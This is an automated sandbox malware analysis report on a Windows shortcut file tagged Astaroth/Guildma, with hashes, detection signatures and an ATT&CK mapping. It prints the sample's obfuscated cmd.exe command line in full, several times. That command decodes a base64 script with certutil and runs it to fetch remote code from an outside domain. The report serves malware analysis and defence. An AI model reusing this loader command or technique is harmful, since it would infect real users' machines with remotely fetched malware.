Windows Analysis Report
WNKpB6SXkg.lnk

Overview

General Information

Sample Name:WNKpB6SXkg.lnk
Analysis ID:794218
MD5:dde2cf4cb9b483e8eb8a2d851deac816
SHA1:2cb939abfa8fec5622662eb8cf0baa1544e0569f
SHA256:76ee775c99099f8f68656e8a9eacf657720add7110ba7f72e65cc538f595be4e
Tags:Astaroth, BRA, geo, Guildma, lnk

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Windows shortcut file (LNK) starts blacklisted processes
Obfuscated command line found
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Program does not show much activity (idle)

Classification

  • System is w10x64
  • cmd.exe (PID: 5196 cmdline: C:\Windows\system32\cmd.exe /V/D/c md C: 58H8S5\>nul 2>&1 &&s^eT RYED=C: 58H8S5\^E58H8S5.^jS&&echo dmFyIEM5ZWc9InNjIisiciI7RDllZz0iaXAiKyJ0OmgiO0U5ZWc9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDOWVnK0Q5ZWcrRTllZysiLy9lY2VpZTYuc2FvYnJhc3R1cmJpbGhhb2Nvc21lLmNvbS8/MS8iKTs=>!RYED!&&cErtUtil -f -dEco^de !RYED! !RYED!&&ca^ll !RYED! MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

Source: classification engine; Classification label: mal52.winLNK@1/1@0/0

Data Obfuscation

barindex
Source: unknown; Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /V/D/c md C: 58H8S5\>nul 2>&1 &&s^eT RYED=C: 58H8S5\^E58H8S5.^jS&&echo dmFyIEM5ZWc9InNjIisiciI7RDllZz0iaXAiKyJ0OmgiO0U5ZWc9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDOWVnK0Q5ZWcrRTllZysiLy9lY2VpZTYuc2FvYnJhc3R1cmJpbGhhb2Nvc21lLmNvbS8/MS8iKTs=>!RYED!&&cErtUtil -f -dEco^de !RYED! !RYED!&&ca^ll !RYED!

Persistence and Installation Behavior

barindex
Source: LNK file; Process created: C:\Windows\System32\cmd.exe
Source: all processes; Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: unknown; Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /v/d/c md c: 58h8s5\>nul 2>&1 &&s^et ryed=c: 58h8s5\^e58h8s5.^js&&echo dmfyiem5zwc9innjiisicii7rdllzz0iaxaikyj0omgio0u5zwc9ilqikyj0ucirijoio0dlde9iamvjdchdowvnk0q5zwcrrtllzysily9ly2vpztyuc2fvynjhc3r1cmjpbghhb2nvc21llmnvbs8/ms8ikts=>!ryed!&&certutil -f -deco^de !ryed! !ryed!&&ca^ll !ryed!
ATT&CK Matrix (tactic: technique; the count badge shown next to a technique in the report is given in parentheses)

  • Initial Access: Valid Accounts
  • Execution: Command and Scripting Interpreter (1 1)
  • Persistence: Path Interception
  • Privilege Escalation: Path Interception
  • Defense Evasion: Deobfuscate/Decode Files or Information (1)
  • Credential Access: OS Credential Dumping
  • Discovery: Process Discovery (1)
  • Lateral Movement: Remote Services
  • Collection: Data from Local System
  • Exfiltration: Exfiltration Over Other Network Medium
  • Command and Control: Data Obfuscation
  • Network Effects: Eavesdrop on Insecure Network Communication
  • Remote Service Effects: Remotely Track Device Without Authorization
  • Impact: Modify System Partition
No Antivirus matches
No contacted domains info
No contacted IP infos
Joe Sandbox Version:36.0.0 Rainbow Opal
Analysis ID:794218
Start date and time:2023-01-30 11:27:09 +01:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 2m 19s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:2
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample file name:WNKpB6SXkg.lnk
Detection:MAL
Classification:mal52.winLNK@1/1@0/0
Cookbook Comments:
  • Found application associated with file extension: .lnk
  • Stop behavior analysis, all processes terminated
  • Exclude process from analysis (whitelisted): conhost.exe
  • Not all processes were analyzed, report is missing behavior information
No simulations
No context
Process:C:\Windows\System32\cmd.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):68
Entropy (8bit):4.257997723692869
Encrypted:false
SSDEEP:3:SMLL6QGHdpK1gi6HY:fRGHzK1/6HY
MD5:75FC1E88767A57080C0EA1E86F00C243
SHA1:70953D42A0723F3CFB0684C4FC71988BC5C35D2F
SHA-256:B243E3431CF3FD2DA74278615CAA676AD4F4F806E23B19FCD398E83A7B02390D
SHA-512:00EC8E87FBF3F1C42228F95954A066E3BED4B86406F31564C3BC386A8EBA4A41E2E0EC8837010A8CD8DF606B938A33A9A797C4EC7D9ACF7C34FABB837CC7BFC6
Malicious:false
Reputation:low
Preview:The filename, directory name, or volume label syntax is incorrect...
File type:MS Windows shortcut, Item id list present, Has Working directory, Has command line arguments, Archive, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hidenormalshowminimized
Entropy (8bit):5.493665403087596
TrID:
  • Windows Shortcut (20020/1) 100.00%
File name:WNKpB6SXkg.lnk
File size:495
MD5:dde2cf4cb9b483e8eb8a2d851deac816
SHA1:2cb939abfa8fec5622662eb8cf0baa1544e0569f
SHA256:76ee775c99099f8f68656e8a9eacf657720add7110ba7f72e65cc538f595be4e
SHA512:77b0e0a33bb00d021aed16fa0348fa8ed8e984fc913a91a629dee15bd74c78e696bb78c26a1c964bb61d62f2e1bdd87dc3f8596dcaf029d48db3b0be40014506
SSDEEP:12:8rflM8OBE6ZGfgKer0fmjdiuML4OmoRm79VNYzPoJKpu68K:8loGf/er0fmBML4Ojm7azPYn63
TLSH:E7F0AB4EE1327DE2C10C65376E061F6C586E394B8FA82562EACF0FC810559C42F0D894
File Content Preview:L..................F1... ...................................................]....P.O. .:i.....+00.../C:\......................+.2...........wINdOws\sYSteM32\conHost.EXe.....C:\wINdOws\sYSteM32-.%ComSpec% /V/D/c "md C:.58H8S5\>nul 2>&1 &&s^eT RYED=C:.58H8S
Icon Hash:00828e868e89bd0d

General

Relative Path:
Command Line Argument:%ComSpec% /V/D/c "md C:58H8S5\>nul 2>&1 &&s^eT RYED=C:58H8S5\^E58H8S5.^jS&&echo dmFyIEM5ZWc9InNjIisiciI7RDllZz0iaXAiKyJ0OmgiO0U5ZWc9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDOWVnK0Q5ZWcrRTllZysiLy9lY2VpZTYuc2FvYnJhc3R1cmJpbGhhb2Nvc21lLmNvbS8/MS8iKTs=>!RYED!&&cErtUtil -f -dEco^de !RYED! !RYED!&&ca^ll !RYED!"
Icon location:

Target ID:1
Start time:11:28:03
Start date:30/01/2023
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /V/D/c md C: 58H8S5\>nul 2>&1 &&s^eT RYED=C: 58H8S5\^E58H8S5.^jS&&echo dmFyIEM5ZWc9InNjIisiciI7RDllZz0iaXAiKyJ0OmgiO0U5ZWc9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDOWVnK0Q5ZWcrRTllZysiLy9lY2VpZTYuc2FvYnJhc3R1cmJpbGhhb2Nvc21lLmNvbS8/MS8iKTs=>!RYED!&&cErtUtil -f -dEco^de !RYED! !RYED!&&ca^ll !RYED!
Imagebase:0x7ff627730000
File size:273920 bytes
MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

No disassembly